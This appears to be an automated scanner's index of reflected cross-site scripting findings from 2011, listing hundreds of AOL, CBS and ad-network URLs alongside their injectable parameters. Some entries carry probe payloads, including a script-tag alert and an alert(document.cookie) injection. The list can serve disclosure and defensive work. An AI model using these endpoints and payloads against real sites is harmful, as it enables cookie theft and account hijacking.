XSS, Cross Site Scripting, aol.com, CWE-79, CAPEC-86

XSS in AOL HTTP Systems | Vulnerability Crawler Report

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 17:40:33 CST 2011.



DORK CWE-79 XSS Report

1. Cross-site scripting (reflected)

1.1. http://about.aol.com/aolnetwork/aol_pp [REST URL parameter 1]

1.2. http://about.aol.com/aolnetwork/aolcom_terms [REST URL parameter 1]

1.3. http://about.aol.com/aolnetwork/mem_tos [REST URL parameter 1]

1.4. http://about.aol.com/aolnetwork/trademarks [REST URL parameter 1]

1.5. http://about.aol.com/sitemap/ [REST URL parameter 1]

1.6. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]

1.7. http://ad.aggregateknowledge.com/iframe!t=639! [clk1 parameter]

1.8. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [kw parameter]

1.9. http://ad.doubleclick.net/adj/brokerbutton.smartmoney.com/article_tools [name of an arbitrarily supplied request parameter]

1.10. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [10,1,103;1920;1200;http%3A_@2F_@2Fwww.dailyfinance.com_@2F_@3F3054c%2522-alertdocument.cookie-%2522c83105876b0%3D1?click parameter]

1.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/1297024518** [name of an arbitrarily supplied request parameter]

1.12. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 2]

1.13. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [REST URL parameter 3]

1.14. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [click parameter]

1.15. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1537.0.js.234x60/24516506 [name of an arbitrarily supplied request parameter]

1.16. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]

1.17. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [cnt parameter]

1.18. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [name of an arbitrarily supplied request parameter]

1.19. http://ads.doclix.com/adserver/serve/js/fixed_size_unit.jsp [pageId parameter]

1.20. http://ads.tw.adsonar.com/adserving/getAds.jsp [pid parameter]

1.21. http://ads.tw.adsonar.com/adserving/getAds.jsp [placementId parameter]

1.22. http://ads.tw.adsonar.com/adserving/getAds.jsp [ps parameter]

1.23. http://adsfac.us/ag.asp [cc parameter]

1.24. http://adv-chart-app.app.aol.com/pfsg/sdr [echo parameter]

1.25. http://advertising.aol.com/brands/dailyfinance [REST URL parameter 2]

1.26. http://advertising.aol.com/brands/dailyfinance [name of an arbitrarily supplied request parameter]

1.27. http://advertising.aol.com/brands/engadget [REST URL parameter 2]

1.28. http://advertising.aol.com/brands/engadget [name of an arbitrarily supplied request parameter]

1.29. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

1.30. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

1.31. http://africa.ibtimes.com/articles/104247/20110125/google-eric-schmidt-larry-page-sergey-brin-china-equity-award-apple-steve-jobs.htm [name of an arbitrarily supplied request parameter]

1.32. http://aol.tt.omtrdc.net/m2/aol/mbox/standard [mbox parameter]

1.33. http://api.bizographics.com/v1/profile.json [api_key parameter]

1.34. http://api.bizographics.com/v1/profile.json [callback parameter]

1.35. http://api.dimestore.com/viapi [name parameter]

1.36. http://api.dimestore.com/viapi [name parameter]

1.37. http://api.dimestore.com/viapi [value parameter]

1.38. http://api.facebook.com/restserver.php [method parameter]

1.39. http://api.facebook.com/restserver.php [urls parameter]

1.40. http://api.screenname.aol.com/auth/getToken [c parameter]

1.41. http://api.tweetmeme.com/url_info.jsonc [callback parameter]

1.42. http://ar.voicefive.com/b/rc.pli [func parameter]

1.43. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 1]

1.44. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 2]

1.45. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 3]

1.46. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 4]

1.47. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 5]

1.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 6]

1.49. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [REST URL parameter 7]

1.50. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [name of an arbitrarily supplied request parameter]

1.51. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600 [noperf parameter]

1.52. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 1]

1.53. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 2]

1.54. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 3]

1.55. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 4]

1.56. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 5]

1.57. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 6]

1.58. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [REST URL parameter 7]

1.59. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [name of an arbitrarily supplied request parameter]

1.60. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

1.61. http://b.scorecardresearch.com/beacon.js [c1 parameter]

1.62. http://b.scorecardresearch.com/beacon.js [c10 parameter]

1.63. http://b.scorecardresearch.com/beacon.js [c15 parameter]

1.64. http://b.scorecardresearch.com/beacon.js [c2 parameter]

1.65. http://b.scorecardresearch.com/beacon.js [c3 parameter]

1.66. http://b.scorecardresearch.com/beacon.js [c4 parameter]

1.67. http://b.scorecardresearch.com/beacon.js [c5 parameter]

1.68. http://b.scorecardresearch.com/beacon.js [c6 parameter]

1.69. http://chinese.engadget.com/ [name of an arbitrarily supplied request parameter]

1.70. http://cn.engadget.com/ [name of an arbitrarily supplied request parameter]

1.71. http://coverage.mqcdn.com/coverage [REST URL parameter 1]

1.72. http://coverage.mqcdn.com/coverage [cat parameter]

1.73. http://coverage.mqcdn.com/coverage [jsonp parameter]

1.74. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

1.75. http://coverage.mqcdn.com/favicon.ico [REST URL parameter 1]

1.76. http://ct.buzzfeed.com/wd/UserWidget [or parameter]

1.77. http://ct.buzzfeed.com/wd/UserWidget [u parameter]

1.78. http://digg.com/submit [REST URL parameter 1]

1.79. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 2]

1.80. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 3]

1.81. http://dm.de.mookie1.com/2/B3DM/2010DM/1117431738@x23 [REST URL parameter 4]

1.82. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 2]

1.83. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 3]

1.84. http://dm.de.mookie1.com/2/B3DM/2010DM/11485203807@x23 [REST URL parameter 4]

1.85. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 2]

1.86. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 3]

1.87. http://dm.de.mookie1.com/2/B3DM/2010DM/1628576703@x23 [REST URL parameter 4]

1.88. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 2]

1.89. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 3]

1.90. http://dm.de.mookie1.com/2/B3DM/2010DM/1671449763@x23 [REST URL parameter 4]

1.91. http://downloads.channel.aol.com/toolbar [REST URL parameter 1]

1.92. http://downloadsquad.switched.com/ [name of an arbitrarily supplied request parameter]

1.93. http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/ [name of an arbitrarily supplied request parameter]

1.94. http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/ [name of an arbitrarily supplied request parameter]

1.95. http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/ [name of an arbitrarily supplied request parameter]

1.96. http://ds.addthis.com/red/psi/sites/www.politicsdaily.com/p.json [callback parameter]

1.97. http://electronista.us.intellitxt.com/al.asp [jscallback parameter]

1.98. http://electronista.us.intellitxt.com/iframescript.jsp [src parameter]

1.99. http://electronista.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

1.100. http://electronista.us.intellitxt.com/v4/advert [jscallback parameter]

1.101. http://electronista.us.intellitxt.com/v4/context [jscallback parameter]

1.102. http://electronista.us.intellitxt.com/v4/init [jscallback parameter]

1.103. http://electronista.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]

1.104. http://es.engadget.com/ [name of an arbitrarily supplied request parameter]

1.105. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.106. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 1]

1.107. http://fonts.citysbest.com/k/uni0vle-e.css [REST URL parameter 2]

1.108. http://fonts.citysbest.com/uni0vle.js [REST URL parameter 1]

1.109. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.110. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.111. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.112. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]

1.113. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]

1.114. http://help.aol.com/help/product/aim [name of an arbitrarily supplied request parameter]

1.115. http://help.aol.com/help/product/aim/ [name of an arbitrarily supplied request parameter]

1.116. http://japanese.engadget.com/ [name of an arbitrarily supplied request parameter]

1.117. http://jlinks.industrybrains.com/jsct [ct parameter]

1.118. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

1.119. http://jlinks.industrybrains.com/jsct [tr parameter]

1.120. http://js.revsci.net/gateway/gw.js [csid parameter]

1.121. http://kr.engadget.com/ [name of an arbitrarily supplied request parameter]

1.122. http://learn2.aol.com/learn.js [REST URL parameter 1]

1.123. http://learn2.aol.com/learn.js [callback parameter]

1.124. http://mads.cbs.com/mac-ad [ADREQ&SP parameter]

1.125. http://mads.cbs.com/mac-ad [ADREQ&beacon parameter]

1.126. http://mads.cbs.com/mac-ad [BRAND parameter]

1.127. http://mads.cbs.com/mac-ad [BRAND parameter]

1.128. http://mads.cbs.com/mac-ad [BRAND parameter]

1.129. http://mads.cbs.com/mac-ad [CELT parameter]

1.130. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

1.131. http://mads.cbs.com/mac-ad [DVAR_GENRE parameter]

1.132. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

1.133. http://mads.cbs.com/mac-ad [DVAR_INSTLANG parameter]

1.134. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

1.135. http://mads.cbs.com/mac-ad [DVAR_SESSION parameter]

1.136. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.137. http://mads.cbs.com/mac-ad [GLOBAL&CLIENT:ID parameter]

1.138. http://mads.cbs.com/mac-ad [NCAT parameter]

1.139. http://mads.cbs.com/mac-ad [NCAT parameter]

1.140. http://mads.cbs.com/mac-ad [NODE parameter]

1.141. http://mads.cbs.com/mac-ad [NODE parameter]

1.142. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

1.143. http://mads.cbs.com/mac-ad [PAGESTATE parameter]

1.144. http://mads.cbs.com/mac-ad [POS parameter]

1.145. http://mads.cbs.com/mac-ad [PTYPE parameter]

1.146. http://mads.cbs.com/mac-ad [PTYPE parameter]

1.147. http://mads.cbs.com/mac-ad [SITE parameter]

1.148. http://mads.cbs.com/mac-ad [cookiesOn parameter]

1.149. http://mads.cbs.com/mac-ad [cookiesOn parameter]

1.150. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

1.151. http://mads.cbs.com/mac-ad [name of an arbitrarily supplied request parameter]

1.152. http://mads.cbs.com/mac-ad [x-cb parameter]

1.153. http://mads.cbs.com/mac-ad [x-cb parameter]

1.154. http://marlothomas.aol.com/ [name of an arbitrarily supplied request parameter]

1.155. http://mlb.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.156. http://money.aol.com/reflector/setCookie [cb parameter]

1.157. http://motorsports.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.158. http://movies.aol.com/trailers/main.adp [REST URL parameter 1]

1.159. http://nba.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.160. http://ncaabasketball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.161. http://ncaafootball.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.162. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 4]

1.163. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 5]

1.164. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [REST URL parameter 6]

1.165. http://network.realmedia.com/RealMedia/ads/adstream_sx.ads/TRACK_Mindsetmedia/Retarget_Secure/642496272@Bottom3 [_RM_HTML_MM_ parameter]

1.166. http://news.travel.aol.com/2009/06/01/long-weekend-getaways-within-the-united-states/ [name of an arbitrarily supplied request parameter]

1.167. http://news.travel.aol.com/2010/10/18/five-secret-hotels-where-you-can-stay-cheap-in-new-york/ [name of an arbitrarily supplied request parameter]

1.168. http://news.travel.aol.com/2011/01/12/travel-myths-debunked/ [name of an arbitrarily supplied request parameter]

1.169. http://news.travel.aol.com/2011/02/04/pilot-falls-into-deep-sleep-on-sas-flight/ [name of an arbitrarily supplied request parameter]

1.170. http://news.travel.aol.com/2011/02/04/virginia-hotel-casts-out-snow-refugees/ [name of an arbitrarily supplied request parameter]

1.171. http://news.travel.aol.com/2011/02/04/world-s-largest-gay-cruise-sets-sail-on-sunday/ [name of an arbitrarily supplied request parameter]

1.172. http://news.travel.aol.com/2011/02/05/american-plane-and-air-force-jets-in-near-miss/ [name of an arbitrarily supplied request parameter]

1.173. http://news.travel.aol.com/best-of/when-is-ash-wednesday-2011/ [name of an arbitrarily supplied request parameter]

1.174. http://news.travel.aol.com/explore-america/ [name of an arbitrarily supplied request parameter]

1.175. http://news.travel.aol.com/hotel/inside-the-royalton-in-new-york-city/ [name of an arbitrarily supplied request parameter]

1.176. http://news.travel.aol.com/hotel/los-angeles-hotels-near-lax/ [name of an arbitrarily supplied request parameter]

1.177. http://nfl.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.178. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]

1.179. http://nfl.fanhouse.com/superbowl [REST URL parameter 1]

1.180. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]

1.181. http://nfl.fanhouse.com/superbowl [name of an arbitrarily supplied request parameter]

1.182. http://nhl.fanhouse.com/ [name of an arbitrarily supplied request parameter]

1.183. http://noticias.aol.com/category/latino-news/ [REST URL parameter 2]

1.184. http://ocp.cbs.com/pacific/Response.jsp [c parameter]

1.185. http://pglb.buzzfed.com/12659/989cc9ecbfd3d382e27b06d49f58dc6f [callback parameter]

1.186. http://portal.pf.aol.com/jsonmfus/ws [callback parameter]

1.187. http://realestate.aol.com/blog/2011/02/04/million-dollar-home-defaults-just-what-the-doctor-ordered/ [REST URL parameter 4]

1.188. http://realestate.aol.com/blog/2011/02/04/worst-foreclosed-home-vandalism-ever/ [REST URL parameter 4]

1.189. http://servedby.flashtalking.com/imp/3/14886 [97125;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1728x904057540633RichMedia/?click parameter]

1.190. http://servedby.flashtalking.com/imp/3/14886 [97126;201;js;AOL;AudienceBehaviorsHealthSeekerCerealL1300x2504057540633RichMedia/?click parameter]

1.191. http://servedby.flashtalking.com/imp/3/14886 [cachebuster parameter]

1.192. http://servedby.flashtalking.com/imp/3/14886 [ftadz parameter]

1.193. http://servedby.flashtalking.com/imp/3/14886 [ftscw parameter]

1.194. http://servedby.flashtalking.com/imp/3/14886 [ftx parameter]

1.195. http://servedby.flashtalking.com/imp/3/14886 [fty parameter]

1.196. http://servedby.flashtalking.com/imp/3/14886 [name of an arbitrarily supplied request parameter]

1.197. http://smallbusiness.aol.com/ [name of an arbitrarily supplied request parameter]

1.198. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [REST URL parameter 3]

1.199. http://smallbusiness.aol.com/2011/02/01/meet-ralph-bruno-the-green-bay-packers-cheesehead-guy/ [name of an arbitrarily supplied request parameter]

1.200. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [REST URL parameter 3]

1.201. http://smallbusiness.aol.com/2011/02/02/gregg-mcarthur-maker-of-the-steelers-terrible-towel-is-a-pa/ [name of an arbitrarily supplied request parameter]

1.202. http://smallbusiness.aol.com/2011/02/05/make-friends/ [REST URL parameter 3]

1.203. http://smallbusiness.aol.com/2011/02/05/make-friends/ [name of an arbitrarily supplied request parameter]

1.204. http://smallbusiness.aol.com/2011/02/05/packers-vs-steelers-battle-of-the-bar-owners/ [name of an arbitrarily supplied request parameter]

1.205. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [REST URL parameter 3]

1.206. http://smallbusiness.aol.com/2011/02/06/enjoy-the-ride/ [name of an arbitrarily supplied request parameter]

1.207. http://smallbusiness.aol.com/category/advertising-and-marketing/ [REST URL parameter 2]

1.208. http://smallbusiness.aol.com/category/advertising-and-marketing/ [name of an arbitrarily supplied request parameter]

1.209. http://smallbusiness.aol.com/category/money/ [REST URL parameter 2]

1.210. http://smallbusiness.aol.com/category/money/ [name of an arbitrarily supplied request parameter]

1.211. http://smallbusiness.aol.com/category/starting-a-business/ [REST URL parameter 2]

1.212. http://smallbusiness.aol.com/category/starting-a-business/ [name of an arbitrarily supplied request parameter]

1.213. http://sports.aol.com/a [REST URL parameter 1]

1.214. http://sports.aol.com/a [REST URL parameter 1]

1.215. http://sports.aol.com/favicon.ico [REST URL parameter 1]

1.216. http://sports.aol.com/favicon.ico [REST URL parameter 1]

1.217. http://sports.aol.com/scores [REST URL parameter 1]

1.218. http://sports.aol.com/scores [REST URL parameter 1]

1.219. http://switcher.dmn.aol.com/sw/a [callback parameter]

1.220. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]

1.221. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [adRotationId parameter]

1.222. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [bannerCreativeAdModuleId parameter]

1.223. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [campaignId parameter]

1.224. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [siteId parameter]

1.225. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.226. http://web.lightningcast.net/servlets/getPlaylist [uid parameter]

1.227. http://webcenter.polls.aol.com/modular.jsp [template parameter]

1.228. http://www.aisledash.com/ [3418b%22%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83))%3C/script%3E3224aeef255 parameter]

1.229. http://www.aisledash.com/ [name of an arbitrarily supplied request parameter]

1.230. http://www.aolhealth.com/ [name of an arbitrarily supplied request parameter]

1.231. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 1]

1.232. http://www.aolhealth.com/encyclopedia/health/ [REST URL parameter 2]

1.233. http://www.aolhealth.com/encyclopedia/health/ [name of an arbitrarily supplied request parameter]

1.234. http://www.aolhealth.com/traffic/ [REST URL parameter 1]

1.235. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]

1.236. http://www.aolnews.com/story/egypt-regime-offers-new-concessions-to/1550027 [REST URL parameter 2]

1.237. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]

1.238. http://www.aolnews.com/story/the-rise-and-fall-of-a-foreclosure-king/1567480 [REST URL parameter 2]

1.239. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.240. http://www.autoblog.com/ [name of an arbitrarily supplied request parameter]

1.241. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [REST URL parameter 3]

1.242. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]

1.243. http://www.autoblog.com/2011/02/06/chevy-camaro-to-underpin-one-of-two-new-gm-vehicles-in-chicago/ [name of an arbitrarily supplied request parameter]

1.244. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [REST URL parameter 3]

1.245. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]

1.246. http://www.autoblog.com/2011/02/06/mahindra-tr40-pickup-only-good-for-19-21-mpg/ [name of an arbitrarily supplied request parameter]

1.247. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [REST URL parameter 3]

1.248. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]

1.249. http://www.autoblog.com/2011/02/06/williams-cosworth-fw33-f1-car-unveiled-ipo-confirmed/ [name of an arbitrarily supplied request parameter]

1.250. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 1]

1.251. http://www.blackvoices.com/life-style/black-travel [REST URL parameter 2]

1.252. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

1.253. http://www.bloggingstocks.com/ [name of an arbitrarily supplied request parameter]

1.254. http://www.bloggingstocks.com/category/stocks-to-buy/ [REST URL parameter 2]

1.255. http://www.bloggingstocks.com/category/stocks-to-buy/ [REST URL parameter 2]

1.256. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]

1.257. http://www.bloggingstocks.com/category/stocks-to-buy/ [name of an arbitrarily supplied request parameter]

1.258. http://www.bloggingstocks.com/category/stocks-to-sell/ [REST URL parameter 2]

1.259. http://www.bloggingstocks.com/category/stocks-to-sell/ [REST URL parameter 2]

1.260. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]

1.261. http://www.bloggingstocks.com/category/stocks-to-sell/ [name of an arbitrarily supplied request parameter]

1.262. http://www.bloglines.com/sub/__FEED__ [REST URL parameter 2]

1.263. http://www.bloglines.com/sub/__FEED__ [REST URL parameter 2]

1.264. http://www.bloglines.com/sub/__FEED__ [REST URL parameter 2]

1.265. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]

1.266. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]

1.267. http://www.bloglines.com/sub/__FEED__ [name of an arbitrarily supplied request parameter]

1.268. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

1.269. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 2]

1.270. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

1.271. http://www.blogsmithmedia.com/www.citysbest.com/include/background.js [REST URL parameter 3]

1.272. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

1.273. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 2]

1.274. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

1.275. http://www.blogsmithmedia.com/www.citysbest.com/include/citysbest-min.js [REST URL parameter 3]

1.276. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

1.277. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 2]

1.278. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 3]

1.279. http://www.blogsmithmedia.com/www.citysbest.com/media/citysbest-min.css [REST URL parameter 3]

1.280. http://www.cbs.com/primetime/big_bang_theory/video/ [name of an arbitrarily supplied request parameter]

1.281. http://www.cbs.com/primetime/big_bang_theory/video/ [nrd parameter]

1.282. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.283. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.284. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.285. http://www.cbs.com/primetime/big_bang_theory/video/ [pid parameter]

1.286. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]

1.287. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [files parameter]

1.288. http://www.cbs.com/sitecommon/includes/cacheable/combine.php [name of an arbitrarily supplied request parameter]

1.289. http://www.citysbest.com/_uac/adpage.html [REST URL parameter 1]

1.290. http://www.citysbest.com/_uac/adpage.html [REST URL parameter 1]

1.291. http://www.citysbest.com/mapquest/ [REST URL parameter 1]

1.292. http://www.citysbest.com/mapquest/ [REST URL parameter 1]

1.293. http://www.citysbest.com/traffic/ [REST URL parameter 1]

1.294. http://www.citysbest.com/traffic/ [REST URL parameter 1]

1.295. http://www.citysbest.com/traffic/status.gif [REST URL parameter 1]

1.296. http://www.citysbest.com/traffic/status.gif [REST URL parameter 1]

1.297. http://www.citysbest.com/traffic/status.gif [REST URL parameter 2]

1.298. http://www.citysbest.com/traffic/status.gif [REST URL parameter 2]

1.299. http://www.dailyfinance.com/ [3054c%22-alert(document.cookie)-%22c83105876b0 parameter]

1.300. http://www.dailyfinance.com/ [name of an arbitrarily supplied request parameter]

1.301. http://www.dailyfinance.com/about/ [name of an arbitrarily supplied request parameter]

1.302. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]

1.303. http://www.dailyfinance.com/article/mga-files-antitrust-case-against-mattel/1178866/ [name of an arbitrarily supplied request parameter]

1.304. http://www.dailyfinance.com/category/careers/ [REST URL parameter 2]

1.305. http://www.dailyfinance.com/category/careers/ [REST URL parameter 2]

1.306. http://www.dailyfinance.com/category/careers/ [name of an arbitrarily supplied request parameter]

1.307. http://www.dailyfinance.com/category/college-finance/ [REST URL parameter 2]

1.308. http://www.dailyfinance.com/category/college-finance/ [REST URL parameter 2]

1.309. http://www.dailyfinance.com/category/college-finance/ [name of an arbitrarily supplied request parameter]

1.310. http://www.dailyfinance.com/category/columns/ [REST URL parameter 2]

1.311. http://www.dailyfinance.com/category/columns/ [REST URL parameter 2]

1.312. http://www.dailyfinance.com/category/columns/ [name of an arbitrarily supplied request parameter]

1.313. http://www.dailyfinance.com/category/earnings/ [REST URL parameter 2]

1.314. http://www.dailyfinance.com/category/earnings/ [REST URL parameter 2]

1.315. http://www.dailyfinance.com/category/earnings/ [name of an arbitrarily supplied request parameter]

1.316. http://www.dailyfinance.com/category/economy/ [REST URL parameter 2]

1.317. http://www.dailyfinance.com/category/economy/ [REST URL parameter 2]

1.318. http://www.dailyfinance.com/category/economy/ [name of an arbitrarily supplied request parameter]

1.319. http://www.dailyfinance.com/category/healthcare/ [REST URL parameter 2]

1.320. http://www.dailyfinance.com/category/healthcare/ [REST URL parameter 2]

1.321. http://www.dailyfinance.com/category/healthcare/ [name of an arbitrarily supplied request parameter]

1.322. http://www.dailyfinance.com/category/investing/ [REST URL parameter 2]

1.323. http://www.dailyfinance.com/category/investing/ [REST URL parameter 2]

1.324. http://www.dailyfinance.com/category/investing/ [name of an arbitrarily supplied request parameter]

1.325. http://www.dailyfinance.com/category/media/ [REST URL parameter 2]

1.326. http://www.dailyfinance.com/category/media/ [REST URL parameter 2]

1.327. http://www.dailyfinance.com/category/media/ [name of an arbitrarily supplied request parameter]

1.328. http://www.dailyfinance.com/category/real-estate/ [REST URL parameter 2]

1.329. http://www.dailyfinance.com/category/real-estate/ [REST URL parameter 2]

1.330. http://www.dailyfinance.com/category/real-estate/ [name of an arbitrarily supplied request parameter]

1.331. http://www.dailyfinance.com/category/special-report/ [REST URL parameter 2]

1.332. http://www.dailyfinance.com/category/special-report/ [REST URL parameter 2]

1.333. http://www.dailyfinance.com/category/special-report/ [name of an arbitrarily supplied request parameter]

1.334. http://www.dailyfinance.com/category/streetwise [REST URL parameter 2]

1.335. http://www.dailyfinance.com/category/streetwise [REST URL parameter 2]

1.336. http://www.dailyfinance.com/category/technology/ [REST URL parameter 2]

1.337. http://www.dailyfinance.com/category/technology/ [REST URL parameter 2]

